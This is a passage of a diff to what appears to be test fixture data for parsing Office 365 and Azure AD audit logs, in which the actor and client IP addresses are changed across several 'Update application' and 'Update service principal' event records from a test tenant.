Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -20423,9 +20423,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:37",
 "ExtendedProperties": [
 {
@@ -20628,7 +20628,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{
\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -20658,9 +20658,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { 
@@ -20875,7 +20875,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{
\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -20905,9 +20905,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { 
@@ -21122,7 +21122,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Valu